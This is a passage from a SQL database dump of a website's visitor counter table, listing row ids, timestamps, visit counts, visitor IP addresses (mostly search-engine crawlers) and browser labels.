2693,1536966047,3,2,1,0,'66.249.65.103',''),(302694,1536966357,1,1,0,0,'216.244.66.241','other'),(302695,1536966550,1,1,0,0,'66.249.65.123','chrome'),(302696,1536967224,1,1,0,0,'8.29.198.26','other'),(302697,1536968777,1,1,0,0,'66.249.65.99','chrome'),(302698,1536968795,1,1,0,0,'216.244.66.241','other'),(302699,1536970210,2,2,0,0,'178.154.244.11','other'),(302700,1536970959,4,4,0,0,'178.154.244.29','other'),(302701,1536971203,2,2,0,0,'178.154.244.11','other'),(302702,1536971281,1,1,0,0,'216.244.66.241','other'),(302703,1536971454,1,0,1,0,'66.249.65.103',''),(302704,1536971455,1,1,0,0,'180.76.15.7','other'),(302705,1536972997,1,1,0,0,'178.154.244.29','other'),(302706,1536973417,1,1,0,0,'66.249.65.103','chrome'),(302707,1536973445,1,1,0,0,'207.46.13.4','other'),(302708,1536973807,1,1,0,0,'8.29.198.27','other'),(302709,1536973861,1,1,0,0,'8.29.198.25','other'),(302710,1536974713,1,1,0,0,'35.162.141.144','chrome'),(302711,1536976354,1,1,0,0,'216.244.66.241','other'),(302712,1536976449,4,4,0,0,'173.208.206.50','other'),(302713,1536976651,1,1,0,0,'52.41.211.72','chrome'),(302714,1536976753,1,1,0,0,'62.205.134.182','msie'),(302715,1536978061,1,1,0,0,'8.29.198.27','other'),(302716,1536978900,1,1,0,0,'144.76.120.197','other'),(302717,1536981414,1,1,0,0,'66.249.65.121','chrome'),(302718,1536981690,1,1,0,0,'216.244.66.241','other'),(302719,1536982202,1,1,0,0,'66.249.65.103','chrome'),(302720,1536982503,1,1,0,0,'66.249.65.105','chrome'),(302721,1536983805,1,1,0,0,'216.244.66.241','other'),(302722,1536984641,2,2,0,0,'8.29.198.27','other'),(302723,1536984757,1,1,0,0,'66.249.65.105','chrome'),(302724,1536985835,1,1,0,0,'5.45.207.19','other'),(302725,1536986420,1,1,0,0,'157.55.39.174','other'),(302726,1536986437,1,1,0,0,'216.244.66.241','other'),(302727,1536986922,1,1,0,0,'95.163.255.102','other'),(302728,1536986925,1,1,0,0,'95.163.255.112','other'),(302729,1536986929,1,1,0,0,'95.163.255.119','other'),(302730,1536987196,2,2,0,0,'178.154.244.29','other'),(302731,1536987347,1,1,0,0,'66.249.65.105','chrome'),(302732,1536987833,2,2,0,0,'178.154.244.11','other'),(302733,1536988430,1,1,0,0,'66.249.65.125','chrome'),(302734,1536988893,1,1,0,0,'8.29.198.25','other'),(302735,1536989404,1,1,0,0,'216.244.66.241','other'),(302736,1536990371,1,1,0,0,'178.154.244.29','other'),(302737,1536991162,2,2,0,0,'216.244.66.241','other'),(302738,1536992698,1,1,0,0,'91.196.178.74','chrome'),(302739,1536993219,1,1,0,0,'91.196.178.136','chrome'),(302740,1536993992,2,2,0,0,'216.244.66.241','other'),(302741,1536995470,1,1,0,0,'8.29.198.25','other'),(302742,1536995519,1,1,0,0,'8.29.198.27','other'),(302743,1536995879,1,0,1,0,'66.249.65.105',''),(302744,1536996238,2,2,0,0,'178.154.244.29','other'),(302745,1536996271,1,1,0,0,'95.163.255.104','other'),(302746,1536996352,3,3,0,0,'216.244.66.241','other'),(302747,1536996607,1,1,0,0,'66.249.65.123','chrome'),(302748,1536996895,1,1,0,0,'66.249.65.99','chrome'),(302749,1536996902,1,1,0,0,'95.163.255.187','other'),(302750,1536997249,1,1,0,0,'66.249.65.121','chrome'),(302751,1536998570,1,1,0,0,'207.46.13.4','other'),(302752,1536999381,1,1,0,0,'216.244.66.241','other'),(302753,1536999722,1,1,0,0,'8.29.198.27','other'),(302754,1537000446,1,1,0,0,'162.210.196.130','other'),(302755,1537000943,1,1,0,0,'157.55.39.40','other'),(302756,1537001426,1,1,0,0,'216.244.66.241','other'),(302757,1537002854,2,2,0,0,'144.168.163.10','chrome'),(302758,1537002864,2,2,0,0,'209.97.157.175','chrome'),(302759,1537003111,1,1,0,0,'95.163.255.190','other'),(302760,1537003366,1,1,0,0,'66.249.65.105','chrome'),(302761,1537003388,1,1,0,0,'157.55.39.174','other'),(302762,1537003997,1,1,0,0,'87.250.224.120','other'),(302763,1537004057,1,1,0,0,'178.154.244.11','other'),(302764,1537004645,1,0,1,0,'66.249.65.103',''),(302765,1537004730,1,1,0,0,'216.244.66.241','other'),(302766,1537004953,1,1,0,0,'66.249.65.123','chrome'),(302767,1537005603,1,1,0,0,'40.77.167.134','other'),(302768,1537005611,1,0,1,0,'37.187.26.42',''),(302769,1537006293,1,1,0,0,'8.29.198.26','other'),(302770,1537006339,1,1,0,0,'66.249.65.103','chrome'),(302771,1537006345,1,1,0,0,'8.29.198.27','other'),(302772,1537006499,1,1,0,0,'66.249.65.99','chrome'),(302773,1537007326,1,1,0,0,'91.196.178.42','chrome'),(302774,1537008796,1,1,0,0,'157.55.39.174','other'),(302775,1537008976,1,1,0,0,'66.249.65.105','chrome'),(302776,1537009749,1,1,0,0,'95.163.255.168','other'),(302777,1537010557,1,1,0,0,'8.29.198.25','other'),(302778,1537011668,1,1,0,0,'46.211.3.124','chrome'),(302779,1537011906,1,0,1,0,'66.249.65.99',''),(302780,1537011973,1,1,0,0,'66.249.65.125','chrome'),(302781,1537013003,1,1,0,0,'66.249.65.105','chrome'),(302782,1537013198,2,2,0,0,'66.249.65.103','chrome'),(302783,1537013680,1,1,0,0,'95.163.255.193','other'),(302784,1537014080,1,1,0,0,'91.196.178.131','firefox'),(302785,1537014281,1,1,0,0,'66.249.65.99','chrome'),(302786,1537014288,1,1,0,0,'157.55.39.174','other'),(302787,1537016290,1,1,0,0,'66.249.65.121','chrome'),(302788,1537016671,1,1,0,0,'178.154.244.11','other'),(302789,1537016672,1,1,0,0,'178.154.244.29','other'),(302790,1537017011,1,1,0,0,'89.178.92.49','chrome'),(302791,1537017114,1,1,0,0,'8.29.198.25','other'),(302792,1537017172,1,1,0,0,'8.29.198.26','other'),(302793,1537017543,1,1,0,0,'216.244.66.241','other'),(302794,1537017902,2,2,0,0,'104.236.21.61','chrome'),(302795,1537018350,1,1,0,0,'95.163.255.192','other'),(302796,1537018864,1,1,0,0,'91.209.11.236','other'),(302797,1537018910,1,1,0,0,'157.55.39.174','other'),(302798,1537019217,1,1,0,0,'95.134.185.163','chrome'),(302799,1537019341,1,1,0,0,'216.244.66.241','other'),(302800,1537019477,1,1,0,0,'95.72.132.110','firefox'),(302801,1537019655,1,1,0,0,'66.249.65.103','chrome'),(302802,1537020004,1,1,0,0,'95.163.255.194','other'),(302803,1537021381,1,1,0,0,'8.29.198.25','other'),(302804,1537022098,2,2,0,0,'66.249.65.103','chrome'),(302805,1537022654,2,2,0,0,'178.154.244.29','other'),(302806,1537022734,1,1,0,0,'66.249.65.125','chrome'),(302807,1537022850,1,1,0,0,'207.46.13.4','other'),(302808,1537022901,1,1,0,0,'180.76.15.12','other'),(302809,1537022907,1,1,0,0,'66.249.65.105','chrome'),(302810,1537023084,1,1,0,0,'5.45.207.19','other'),(302811,1537023861,1,1,0,0,'5.45.207.79','other'),(302812,1537023918,3,3,0,0,'178.154.244.29','other'),(302813,1537023960,1,1,0,0,'178.154.244.11','other'),(302814,1537026043,1,1,0,0,'91.196.178.100','chrome'),(302815,1537027433,1,1,0,0,'54.165.59.7','other'),(302816,1537027948,2,2,0,0,'8.29.198.26','other'),(302817,1537028475,1,0,1,0,'66.249.65.99',''),(302818,1537028501,1,1,0,0,'66.249.65.103','chrome'),(302819,1537028763,1,1,0,0,'66.249.65.123','chrome'),(302820,1537029255,2,2,0,0,'216.244.66.241','other'),(302821,1537030121,1,1,0,0,'66.249.65.99','chrome'),(302822,1537032127,1,1,0,0,'91.229.123.41','chrome'),(302823,1537032214,1,1,0,0,'8.29.198.25','other'),(302824,1537032597,1,1,0,0,'216.244.66.241','other'),(302825,1537032913,1,1,0,0,'207.46.13.4','other'),(302826,1537034455,1,1,0,0,'40.77.167.134','other'),(302827,1537034570,1,1,0,0,'216.244.66.241','other'),(302828,1537035987,1,1,0,0,'91.196.179.85','other'),(302829,1537036431,1,0,1,0,'66.249.65.105',''),(302830,1537036544,1,1,0,0,'141.101.27.201','chrome'),(302831,1537036563,2,2,0,0,'91.196.178.186','chrome'),(302832,1537036658,1,1,0,0,'66.249.65.103','chrome'),(302833,1537037033,1,1,0,0,'66.249.65.125','chrome'),(302834,1537038095,1,1,0,0,'40.77.167.134','other'),(302835,1537038631,1,1,0,0,'91.196.178.134','chrome'),(302836,1537038777,2,2,0,0,'8.29.198.25','other'),(302837,1537039888,1,1,0,0,'40.77.167.134','other'),(302838,1537039962,1,1,0,0,'178.154.171.60','other'),(302839,1537039983,2,2,0,0,'5.45.207.19','other'),(302840,1537040272,1,1,0,0,'213.180.203.9','other'),(302841,1537040484,1,1,0,0,'180.76.15.162','other'),(302842,1537040627,1,1,0,0,'5.45.207.80','other'),(302843,1537040628,1,1,0,0,'157.55.39.40','other'),(302844,1537040774,2,2,0,0,'178.154.244.29','other'),(302845,1537040974,1,1,0,0,'141.8.142.108','other'),(302846,1537041512,2,2,0,0,'157.55.39.174','other'),(302847,1537041549,1,1,0,0,'46.229.168.146','other'),(302848,1537041739,2,2,0,0,'178.154.244.29','other'),(302849,1537043042,1,1,0,0,'8.29.198.27','other'),(302850,1537044511,1,1,0,0,'66.249.65.105','chrome'),(302851,1537044773,1,1,0,0,'216.244.66.241','other'),(302852,1537044919,1,1,0,0,'194.44.129.159','chrome'),(302853,1537045199,1,1,0,0,'157.55.39.174','other'),(302854,1537045758,1,0,1,0,'66.249.65.103',''),(302855,1537045842,1,1,0,0,'66.249.65.125','chrome'),(302856,1537046143,1,1,0,0,'66.249.65.123','chrome'),(302857,1537046278,1,1,0,0,'157.55.39.174','other'),(302858,1537047723,1,1,0,0,'66.249.65.105','chrome'),(302859,1537047777,1,1,0,0,'66.249.65.99','chrome'),(302860,1537048917,1,1,0,0,'85.143.174.119','firefox'),(302861,1537048929,1,1,0,0,'158.58.163.138','firefox'),(302862,1537049604,2,2,0,0,'8.29.198.26','other'),(302863,1537051714,1,1,0,0,'95.163.255.152','other'),(302864,1537051914,1,1,0,0,'66.249.65.103','chrome'),(302865,1537052590,1,1,0,0,'66.249.65.99','chrome'),(302866,1537053871,1,1,0,0,'8.29.198.25','other'),(302867,1537054640,1,1,0,0,'216.244.66.241','other'),(302868,1537054755,1,1,0,0,'157.55.39.196','other'),(302869,1537055092,1,0,1,0,'66.249.65.103',''),(302870,1537055882,1,1,0,0,'66.249.65.125','chrome'),(302871,1537058618,1,1,0,0,'66.249.65.105','chrome'),(302872,1537059482,1,0,1,0,'66.249.65.121',''),(302873,1537060432,1,1,0,0,'8.29.198.25','other'),(302874,1537060477,1,1,0,0,'8.29.198.27','other'),(302875,1537060936,1,1,0,0,'35.162.141.144','chrome'),(302876,1537061383,1,1,0,0,'178.154.244.11','other'),(302877,1537061384,1,1,0,0,'5.45.207.79','other'),(302878,1537061857,1,0,1,0,'66.249.65.99',''),(302879,1537062281,1,1,0,0,'180.76.15.144','other'),(302880,1537063465,37,37,0,0,'144.76.120.197','other'),(302881,1537063668,1,1,0,0,'66.249.65.103','chrome'),(302882,1537063892,1,1,0,0,'66.249.65.105','chrome'),(302883,1537064415,1,1,0,0,'157.55.39.174','other'),(302884,1537064698,1,1,0,0,'8.29.198.26','other'),(302885,1537065437,1,1,0,0,'95.163.255.119','other'),(302886,1537065487,1,1,0,0,'95.163.255.108','other'),(302887,1537065604,1,1,0,0,'37.115.197.89','firefox'),(302888,1537066012,1,1,0,0,'95.163.255.116','other'),(302889,1537066030,1,0,1,0,'66.249.65.99',''),(302890,1537066834,1,1,0,0,'52.41.211.72','chrome'),(302891,1537067228,1,1,0,0,'66.249.65.103','chrome'),(302892,1537067374,1,1,0,0,'66.249.65.123','chrome'),(302893,1537071252,2,2,0,0,'8.29.198.25','other'),(302894,1537071253,2,2,0,0,'95.213.141.126','opera'),(302895,1537071400,1,1,0,0,'66.249.65.99','chrome'),(302896,1537071445,1,1,0,0,'66.249.65.105','chrome'),(302897,1537071501,1,0,1,0,'66.249.65.103',''),(302898,1537071652,1,1,0,0,'95.163.255.113','other'),(302899,1537072456,1,1,0,0,'66.249.65.103','chrome'),(302900,1537073105,1,1,0,0,'66.249.65.105','chrome'),(302901,1537074791,1,1,0,0,'95.163.255.93','other'),(302902,1537074954,1,1,0,0,'66.249.65.125','chrome'),(302903,1537075521,1,1,0,0,'8.29.198.27','other'),(302904,1537075977,1,1,0,0,'180.76.15.12','other'),(302905,1537077742,6,6,0,0,'178.63.34.189','other'),(302906,1537077999,1,1,0,0,'95.163.255.193','other'),(302907,1537078114,1,1,0,0,'178.154.244.29','other'),(302908,1537079014,1,1,0,0,'66.249.65.105','chrome'),(302909,1537079018,1,1,0,0,'92.113.189.235','chrome'),(302910,1537079530,1,1,0,0,'178.154.244.11','other'),(302911,1537079545,3,3,0,0,'178.154.244.29','other'),(302912,1537079622,1,1,0,0,'87.250.224.65','other'),(302913,1537079672,1,1,0,0,'216.244.66.241','other'),(302914,1537080005,1,1,0,0,'5.45.207.8','other'),(302915,1537080398,1,0,1,0,'66.249.65.99',''),(302916,1537080409,1,1,0,0,'66.249.65.103','chrome'),(302917,1537081473,1,1,0,0,'178.154.244.29','other'),(302918,1537082070,2,2,0,0,'8.29.198.26','other'),(302919,1537084025,1,1,0,0,'66.249.65.125','chrome'),(302920,1537084030,1,1,0,0,'66.249.65.105','chrome'),(302921,1537086346,1,1,0,0,'8.29.198.27','other'),(302922,1537087084,1,1,0,0,'193.194.127.222','firefox'),(302923,1537089513,1,1,0,0,'66.249.65.99','chrome'),(302924,1537090136,1,1,0,0,'92.113.189.235','chrome'),(302925,1537090269,1,1,0,0,'66.249.65.105','chrome'),(302926,1537090673,1,1,0,0,'66.249.65.99','chrome'),(302927,1537090825,1,0,1,0,'66.249.65.103',''),(302928,1537090944,1,1,0,0,'66.249.65.125','chrome'),(302929,1537091115,1,1,0,0,'91.196.178.189','chrome'),(302930,1537092894,2,2,0,0,'8.29.198.25','other'),(302931,1537093924,1,1,0,0,'216.244.66.241','other'),(302932,1537094429,1,1,0,0,'91.209.11.236','other'),(302933,1537094530,1,1,0,0,'180.76.15.23','other'),(302934,1537096345,1,1,0,0,'216.244.66.241','other'),(302935,1537096751,1,1,0,0,'52.53.201.78','chrome'),(302936,1537097177,1,1,0,0,'8.29.198.25','other'),(302937,1537097656,2,1,1,0,'66.249.65.103',''),(302938,1537097912,2,2,0,0,'66.249.65.105','chrome'),(302939,1537098217,1,1,0,0,'66.249.65.125','chrome'),(302940,1537099874,7,7,0,0,'178.154.244.29','other'),(302941,1537100129,2,2,0,0,'5.45.207.79','other'),(302942,1537100477,3,3,0,0,'178.154.244.11','other'),(302943,1537100610,1,1,0,0,'87.250.224.65','other'),(302944,1537100778,4,4,0,0,'178.154.244.29','other'),(302945,1537101682,2,2,0,0,'178.154.244.29','other'),(302946,1537101896,1,1,0,0,'5.45.207.79','other'),(302947,1537102022,3,3,0,0,'178.154.244.11','other'),(302948,1537102734,1,1,0,0,'178.154.244.29','other'),(302949,1537103714,1,1,0,0,'8.29.198.27','other'),(302950,1537103785,1,1,0,0,'8.29.198.25','other'),(302951,1537105173,1,1,0,0,'66.249.65.125','chrome'),(302952,1537105291,1,1,0,0,'31.41.88.91','firefox'),(302953,1537106114,1,0,1,0,'66.249.65.103',''),(302954,1537106709,1,1,0,0,'66.249.65.99','chrome'),(302955,1537107072,1,0,1,0,'66.249.65.103',''),(302956,1537107124,1,1,0,0,'91.196.178.173','chrome'),(302957,1537107406,1,1,0,0,'95.163.255.94','other'),(302958,1537107473,1,1,0,0,'157.55.39.196','other'),(302959,1537108012,1,1,0,0,'8.29.198.25','other'),(302960,1537108604,1,1,0,0,'108.59.8.70','other'),(302961,1537109101,1,1,0,0,'157.55.39.174','other'),(302962,1537109346,1,1,0,0,'157.55.39.196','other'),(302963,1537111532,1,1,0,0,'95.163.255.195','other'),(302964,1537111764,1,1,0,0,'66.249.65.99','chrome'),(302965,1537112401,1,1,0,0,'95.24.201.60','msie'),(302966,1537112574,1,1,0,0,'66.249.65.121','chrome'),(302967,1537113077,3,3,0,0,'69.58.178.57','other'),(302968,1537114537,2,2,0,0,'8.29.198.27','other'),(302969,1537114622,1,0,1,0,'66.249.65.99',''),(302970,1537116232,1,1,0,0,'66.249.65.103','chrome'),(302971,1537116492,1,1,0,0,'54.36.149.29','other'),(302972,1537116507,1,1,0,0,'54.36.148.25','other'),(302973,1537116586,1,1,0,0,'54.36.148.73','other'),(302974,1537116758,1,1,0,0,'54.36.148.185','other'),(302975,1537116830,1,1,0,0,'54.36.149.104','other'),(302976,1537116993,1,1,0,0,'54.36.149.5','other'),(302977,1537117539,1,1,0,0,'54.36.149.86','other'),(302978,1537117578,1,1,0,0,'66.249.65.99','chrome'),(302979,1537117613,1,1,0,0,'64.246.165.190','firefox'),(302980,1537117743,1,1,0,0,'54.36.148.195','other'),(302981,1537117774,1,1,0,0,'54.36.148.164','other'),(302982,1537117904,1,1,0,0,'54.36.148.174','other'),(302983,1537117986,1,1,0,0,'54.36.149.103','other'),(302984,1537118002,1,1,0,0,'54.36.148.165','other'),(302985,1537118429,1,1,0,0,'54.36.148.40','other'),(302986,1537118807,1,1,0,0,'54.36.148.32','other'),(302987,1537118847,1,1,0,0,'8.29.198.27','other'),(302988,1537118856,1,1,0,0,'54.36.148.124','other'),(302989,1537118913,2,2,0,0,'54.36.149.10','other'),(302990,1537119173,1,1,0,0,'54.36.148.206','other'),(302991,1537119646,1,1,0,0,'54.36.149.48','other'),(302992,1537119749,1,1,0,0,'54.36.149.28','other'),(302993,1537119873,1,1,0,0,'54.36.148.194','other'),(302994,1537119902,2,2,0,0,'178.154.244.29','other'),(302995,1537120020,1,1,0,0,'54.36.148.40','other'),(302996,1537120022,2,2,0,0,'54.36.148.50','other'),(302997,1537120148,1,1,0,0,'66.249.65.121','chrome'),(302998,1537120205,1,1,0,0,'54.36.148.112','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (302999,1537120391,1,1,0,0,'157.55.39.174','other'),(303000,1537121239,1,1,0,0,'54.36.148.169','other'),(303001,1537121348,1,1,0,0,'66.249.65.103','chrome'),(303002,1537121511,1,0,1,0,'66.249.65.99',''),(303003,1537121535,1,1,0,0,'168.235.201.16','chrome'),(303004,1537121649,1,1,0,0,'54.36.148.203','other'),(303005,1537121762,1,1,0,0,'54.36.148.132','other'),(303006,1537121840,1,1,0,0,'180.76.15.161','other'),(303007,1537122075,1,1,0,0,'54.36.148.88','other'),(303008,1537122395,1,1,0,0,'91.209.11.236','other'),(303009,1537122449,1,1,0,0,'54.36.148.148','other'),(303010,1537122451,1,1,0,0,'54.36.149.20','other'),(303011,1537122522,3,3,0,0,'178.154.244.11','other'),(303012,1537122774,1,1,0,0,'54.36.148.202','other'),(303013,1537122789,1,1,0,0,'54.36.149.92','other'),(303014,1537122867,1,1,0,0,'54.36.148.149','other'),(303015,1537122912,2,2,0,0,'178.20.153.90','other'),(303016,1537122943,1,1,0,0,'178.154.244.29','other'),(303017,1537123220,1,1,0,0,'54.36.148.151','other'),(303018,1537123559,1,1,0,0,'66.249.65.105','chrome'),(303019,1537123609,1,1,0,0,'66.249.65.103','chrome'),(303020,1537123639,1,1,0,0,'54.36.148.158','other'),(303021,1537123744,1,1,0,0,'77.37.161.253','chrome'),(303022,1537123831,1,1,0,0,'54.36.148.214','other'),(303023,1537123958,1,1,0,0,'54.36.149.51','other'),(303024,1537124072,1,1,0,0,'54.36.148.124','other'),(303025,1537124117,1,1,0,0,'54.36.148.134','other'),(303026,1537124300,1,1,0,0,'54.36.148.74','other'),(303027,1537124383,1,1,0,0,'54.36.148.96','other'),(303028,1537124449,1,1,0,0,'216.244.66.241','other'),(303029,1537124467,1,1,0,0,'54.36.149.45','other'),(303030,1537124564,1,1,0,0,'54.36.148.168','other'),(303031,1537124780,1,1,0,0,'54.36.149.27','other'),(303032,1537124782,1,1,0,0,'54.36.148.68','other'),(303033,1537124872,1,1,0,0,'54.36.148.243','other'),(303034,1537124987,1,1,0,0,'54.36.149.6','other'),(303035,1537125320,1,1,0,0,'54.36.148.186','other'),(303036,1537125357,2,2,0,0,'8.29.198.25','other'),(303037,1537125550,1,1,0,0,'66.249.65.125','chrome'),(303038,1537125705,1,1,0,0,'54.36.149.32','other'),(303039,1537125888,1,1,0,0,'54.36.149.101','other'),(303040,1537125901,1,1,0,0,'54.36.148.170','other'),(303041,1537125905,1,1,0,0,'54.36.148.130','other'),(303042,1537125928,1,1,0,0,'54.36.148.219','other'),(303043,1537126019,1,1,0,0,'54.36.148.52','other'),(303044,1537126041,1,1,0,0,'54.36.148.17','other'),(303045,1537126257,1,1,0,0,'54.36.148.103','other'),(303046,1537126467,1,0,1,0,'66.249.65.103',''),(303047,1537126723,1,1,0,0,'54.36.148.39','other'),(303048,1537126950,1,1,0,0,'54.36.148.28','other'),(303049,1537127004,1,1,0,0,'216.244.66.241','other'),(303050,1537127166,1,1,0,0,'54.36.149.68','other'),(303051,1537127249,1,1,0,0,'54.36.149.1','other'),(303052,1537127617,1,1,0,0,'54.36.148.91','other'),(303053,1537127671,1,1,0,0,'54.36.149.73','other'),(303054,1537128270,1,1,0,0,'54.36.148.213','other'),(303055,1537128290,1,1,0,0,'54.36.148.17','other'),(303056,1537128415,1,1,0,0,'54.36.148.188','other'),(303057,1537128515,1,1,0,0,'54.36.149.84','other'),(303058,1537128519,1,1,0,0,'54.36.148.88','other'),(303059,1537128525,1,1,0,0,'54.36.148.247','other'),(303060,1537129055,1,1,0,0,'54.36.148.103','other'),(303061,1537129112,1,1,0,0,'54.36.149.68','other'),(303062,1537129185,1,1,0,0,'66.249.65.105','chrome'),(303063,1537129418,1,1,0,0,'54.36.149.81','other'),(303064,1537129688,1,1,0,0,'8.29.198.27','other'),(303065,1537129755,1,1,0,0,'54.36.148.194','other'),(303066,1537130289,1,1,0,0,'66.249.65.99','chrome'),(303067,1537130477,1,1,0,0,'54.36.148.251','other'),(303068,1537130489,1,1,0,0,'66.249.65.105','chrome'),(303069,1537130566,1,1,0,0,'54.36.149.25','other'),(303070,1537130707,1,1,0,0,'54.36.148.226','other'),(303071,1537130803,1,1,0,0,'66.249.65.125','chrome'),(303072,1537130854,1,1,0,0,'54.36.148.73','other'),(303073,1537131243,1,1,0,0,'54.36.148.45','other'),(303074,1537131794,1,1,0,0,'54.36.148.27','other'),(303075,1537132126,1,1,0,0,'54.36.148.242','other'),(303076,1537132188,1,1,0,0,'54.36.149.43','other'),(303077,1537132366,1,1,0,0,'216.244.66.241','other'),(303078,1537132611,1,1,0,0,'54.36.149.107','other'),(303079,1537132680,1,1,0,0,'54.36.148.41','other'),(303080,1537132703,1,1,0,0,'54.36.148.240','other'),(303081,1537132863,1,1,0,0,'54.36.148.50','other'),(303082,1537133081,1,1,0,0,'54.36.149.24','other'),(303083,1537133199,1,1,0,0,'54.36.148.236','other'),(303084,1537133225,1,1,0,0,'54.36.148.197','other'),(303085,1537133246,1,1,0,0,'54.36.148.94','other'),(303086,1537133525,1,1,0,0,'54.36.148.177','other'),(303087,1537133645,1,1,0,0,'54.36.148.93','other'),(303088,1537134037,1,1,0,0,'54.36.149.6','other'),(303089,1537134177,1,1,0,0,'54.36.148.85','other'),(303090,1537134346,1,1,0,0,'66.249.65.103','chrome'),(303091,1537134479,1,1,0,0,'54.36.148.91','other'),(303092,1537134500,1,1,0,0,'54.36.148.231','other'),(303093,1537135076,1,1,0,0,'54.36.149.30','other'),(303094,1537135106,1,1,0,0,'54.36.148.74','other'),(303095,1537135411,1,1,0,0,'54.36.149.105','other'),(303096,1537135505,1,1,0,0,'54.36.148.110','other'),(303097,1537135506,1,1,0,0,'54.36.149.17','other'),(303098,1537135536,1,1,0,0,'40.77.167.107','other'),(303099,1537135634,1,1,0,0,'54.36.149.10','other'),(303100,1537135708,1,1,0,0,'54.36.148.57','other'),(303101,1537135842,1,1,0,0,'54.36.148.232','other'),(303102,1537136095,1,1,0,0,'66.249.65.105','chrome'),(303103,1537136110,1,1,0,0,'54.36.148.12','other'),(303104,1537136176,1,1,0,0,'8.29.198.26','other'),(303105,1537136250,1,1,0,0,'8.29.198.27','other'),(303106,1537136286,1,1,0,0,'54.36.149.45','other'),(303107,1537136314,1,1,0,0,'178.154.244.11','other'),(303108,1537136315,1,1,0,0,'178.154.244.29','other'),(303109,1537136351,1,0,1,0,'66.249.65.103',''),(303110,1537136683,1,1,0,0,'66.249.65.121','chrome'),(303111,1537137341,1,1,0,0,'216.244.66.241','other'),(303112,1537137342,1,1,0,0,'54.36.148.160','other'),(303113,1537137560,1,1,0,0,'54.36.148.118','other'),(303114,1537137570,1,1,0,0,'54.36.148.17','other'),(303115,1537137712,1,1,0,0,'54.36.148.237','other'),(303116,1537137799,1,1,0,0,'54.36.148.86','other'),(303117,1537138064,1,1,0,0,'54.36.148.133','other'),(303118,1537138245,1,1,0,0,'54.36.148.255','other'),(303119,1537138493,1,1,0,0,'54.36.148.56','other'),(303120,1537138719,1,1,0,0,'54.36.148.86','other'),(303121,1537138747,1,1,0,0,'66.249.65.99','chrome'),(303122,1537138876,1,1,0,0,'54.36.148.115','other'),(303123,1537138896,1,1,0,0,'54.36.148.11','other'),(303124,1537138922,1,1,0,0,'54.36.148.24','other'),(303125,1537139043,1,1,0,0,'54.36.148.76','other'),(303126,1537139206,1,1,0,0,'54.36.148.161','other'),(303127,1537139236,1,1,0,0,'54.36.148.222','other'),(303128,1537139380,1,1,0,0,'54.36.148.174','other'),(303129,1537139416,1,1,0,0,'54.36.148.85','other'),(303130,1537139417,1,1,0,0,'54.36.148.148','other'),(303131,1537139490,1,0,1,0,'66.249.65.103',''),(303132,1537139637,1,1,0,0,'216.244.66.241','other'),(303133,1537139719,1,1,0,0,'54.36.149.51','other'),(303134,1537139907,1,1,0,0,'54.36.148.84','other'),(303135,1537140068,1,1,0,0,'54.36.149.28','other'),(303136,1537140200,1,1,0,0,'54.36.148.125','other'),(303137,1537140235,1,1,0,0,'54.36.148.228','other'),(303138,1537140281,1,1,0,0,'54.36.148.182','other'),(303139,1537140391,1,1,0,0,'54.36.148.176','other'),(303140,1537140418,1,1,0,0,'54.36.148.56','other'),(303141,1537140473,1,1,0,0,'54.36.149.46','other'),(303142,1537140519,1,1,0,0,'8.29.198.25','other'),(303143,1537140577,1,1,0,0,'54.36.148.166','other'),(303144,1537140635,1,1,0,0,'54.36.149.6','other'),(303145,1537140643,1,1,0,0,'54.36.149.21','other'),(303146,1537140783,1,1,0,0,'54.36.149.75','other'),(303147,1537140799,1,1,0,0,'54.36.148.173','other'),(303148,1537140851,1,1,0,0,'54.36.148.50','other'),(303149,1537140902,1,1,0,0,'54.36.148.171','other'),(303150,1537140993,1,1,0,0,'54.36.149.67','other'),(303151,1537141085,1,1,0,0,'54.36.148.202','other'),(303152,1537141182,1,1,0,0,'54.36.148.217','other'),(303153,1537141233,1,1,0,0,'66.249.65.99','chrome'),(303154,1537141307,1,1,0,0,'40.77.167.107','other'),(303155,1537141555,1,1,0,0,'54.36.148.29','other'),(303156,1537141611,1,1,0,0,'54.36.148.56','other'),(303157,1537141616,1,1,0,0,'66.249.65.121','chrome'),(303158,1537141687,1,1,0,0,'54.36.148.147','other'),(303159,1537141849,1,1,0,0,'54.36.149.42','other'),(303160,1537141984,1,1,0,0,'54.36.149.12','other'),(303161,1537142148,1,1,0,0,'54.36.149.91','other'),(303162,1537142170,1,1,0,0,'54.36.148.40','other'),(303163,1537142247,1,1,0,0,'54.36.148.133','other'),(303164,1537142291,1,1,0,0,'54.36.148.154','other'),(303165,1537142329,1,1,0,0,'54.36.149.88','other'),(303166,1537142529,1,1,0,0,'54.36.148.183','other'),(303167,1537142595,1,1,0,0,'54.36.148.188','other'),(303168,1537142690,1,1,0,0,'54.36.148.120','other'),(303169,1537142759,1,1,0,0,'54.36.149.106','other'),(303170,1537142990,1,1,0,0,'54.36.149.63','other'),(303171,1537143024,1,1,0,0,'54.36.148.241','other'),(303172,1537143107,2,2,0,0,'54.36.148.75','other'),(303173,1537143118,2,2,0,0,'54.36.149.38','other'),(303174,1537143316,1,1,0,0,'54.36.148.190','other'),(303175,1537143420,1,1,0,0,'54.36.149.49','other'),(303176,1537143494,1,1,0,0,'54.36.148.64','other'),(303177,1537143563,1,1,0,0,'178.154.244.11','other'),(303178,1537143587,1,1,0,0,'54.36.148.145','other'),(303179,1537143636,1,1,0,0,'54.36.148.220','other'),(303180,1537143719,3,3,0,0,'178.154.244.29','other'),(303181,1537143724,1,1,0,0,'54.36.148.251','other'),(303182,1537143899,1,1,0,0,'54.36.149.21','other'),(303183,1537143944,1,1,0,0,'54.36.148.70','other'),(303184,1537143948,2,2,0,0,'54.36.149.98','other'),(303185,1537144264,1,1,0,0,'54.36.149.51','other'),(303186,1537144458,2,1,1,0,'66.249.65.105',''),(303187,1537144603,1,1,0,0,'54.36.149.60','other'),(303188,1537144615,1,1,0,0,'54.36.148.195','other'),(303189,1537144631,1,1,0,0,'40.77.167.107','other'),(303190,1537144920,3,3,0,0,'178.154.244.11','other'),(303191,1537144995,1,1,0,0,'54.36.148.163','other'),(303192,1537145027,1,1,0,0,'54.36.148.200','other'),(303193,1537145052,2,2,0,0,'178.154.244.29','other'),(303194,1537145073,1,1,0,0,'54.36.148.22','other'),(303195,1537145239,1,1,0,0,'54.36.148.249','other'),(303196,1537145356,1,1,0,0,'54.36.148.143','other'),(303197,1537145564,1,1,0,0,'54.36.149.83','other'),(303198,1537145625,1,1,0,0,'5.45.207.19','other'),(303199,1537146024,1,1,0,0,'5.45.207.79','other'),(303200,1537146062,1,1,0,0,'178.154.244.11','other'),(303201,1537146104,1,1,0,0,'54.36.149.16','other'),(303202,1537